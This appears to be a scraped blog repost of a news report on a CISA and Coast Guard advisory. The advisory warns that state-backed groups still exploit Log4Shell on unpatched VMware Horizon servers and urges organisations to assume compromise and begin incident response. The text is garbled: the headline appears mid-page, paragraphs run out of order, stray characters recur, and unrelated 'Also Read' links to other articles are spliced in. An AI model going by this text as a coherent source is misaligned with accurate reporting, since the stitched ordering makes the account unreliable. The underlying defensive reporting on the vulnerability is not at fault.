![]() Since the start of the year, VMware Horizon servers have been targeted by Chinese-speaking threat actors to deploy Night Sky ransomware, the Lazarus North Korean APT to deploy information stealers, and the TunnelVision Iranian-aligned hacking group to deploy backdoors. Today’s advisory comes after VMware has also urged customers in January to secure Internet-exposed VMware Horizon servers against ongoing Log4Shell attacks.Īlso Read: Things to Know about the Spam Control Act (Singapore) “If potential compromise is detected, administrators should apply the incident response recommendations included in this CSA and report key findings to CISA.” “CISA and CGCYBER recommend all organizations with affected systems that did not immediately apply available patches or workarounds to assume compromise and initiate threat hunting activities using the IOCs provided in this CSA, Malware Analysis Report (MAR)- 10382580-1, and MAR-10382254-1,” the two agencies said. The steps required for proper response in such a situation include the immediate isolation of potentially affected systems, collection and review of relevant logs and artifacts, hiring third-party IR experts (if needed), and reporting the incident to CISA. Organizations that haven’t yet patched their VMware servers are advised to tag them as hacked and start incident response (IR) procedures. “In one confirmed compromise, these APT actors were able to move laterally inside the network, gain access to a disaster recovery network, and collect and exfiltrate sensitive data.” Unpatched VMware systems should be considered compromised “As part of this exploitation, suspected APT actors implanted loader malware on compromised systems with embedded executables enabling remote command and control (C2),” the advisory revealed. Today, in a joint advisory with the US Coast Guard Cyber Command (CGCYBER), the cybersecurity agency said that servers have been compromised using Log4Shell exploits to gain initial access into targeted organizations’ networks.Īfter breaching the networks, they deployed various malware strains providing them with the remote access needed to deploy additional payloads and exfiltrate hundreds of gigabytes of sensitive information. ![]() CISA: Log4Shell Exploits Still Being Used to Hack VMware ServersĬISA warned today that threat actors, including state-backed hacking groups, are still targeting VMware Horizon and Unified Access Gateway (UAG) servers using the Log4Shell (CVE-2021-44228) remote code execution vulnerability.Īttackers can exploit Log4Shell remotely on vulnerable servers exposed to local or Internet access to move laterally across networks until they gain access to internal systems containing sensitive data.Īfter its disclosure in December 2021, multiple threat actors began scanning for and exploiting unpatched systems, including state-backed hacking groups from China, Iran, North Korea, and Turkey, as well as several access brokers commonly used by ransomware gangs.Īlso Read: 7 Key Principles of Privacy by Design that Businesses should adopt ![]()
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |